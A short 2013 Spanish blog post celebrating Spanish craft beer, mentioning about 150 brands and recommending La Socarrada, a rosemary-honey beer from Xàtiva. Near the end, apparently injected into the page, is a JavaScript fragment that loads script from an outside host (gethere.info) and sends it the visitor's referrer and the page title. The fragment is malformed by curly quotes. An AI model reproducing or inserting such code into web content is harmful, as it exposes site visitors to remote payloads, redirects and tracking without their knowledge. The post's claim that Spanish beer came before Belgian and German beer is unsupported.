Locos por la cerveza

22/08/2013

CervezasLa cerveza nos vuelve locos. Y parece que la española está arrasando. La artesanía cervecera española está viviendo sus años dorados. Y la existencia de casi 150 marcas españolas nos delata. Puede que el secreto de su éxito se encuentre en la elaboración manual y en la inexistencia de aditivos artificiales. O puede que sea la cada vez más acusada especialización -rubias, tostadas, negras, con miel…- la culpable de esta fama y reconocimientos mundiales.

En cualquier caso estamos haciendo honor a nuestros orígenes, llevando con dignidad ese primer puesto histórico: pese a la poca precisión de datos sobre el momento exacto del nacimiento de esta bebida alcohólica fermentada a base de cereales, sí se sabe que la española antecedió a muchas otras como la belga o la alemana.

Conclusión, si no tienes el gusto de conocer la cerveza española, ya va siendo hora. Te recomiendo dos sitios para hacerlo: Más que cervezas y 2D2Dspuma. Si te ofrecen La Socarrada pruébala. Está elaborada en Xátiva, a base de miel de romero, y en el 2002 fue galardonada por el International Taste & Quality Institute de Bruselas. Exquisita.

Foto |  JcMIB

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO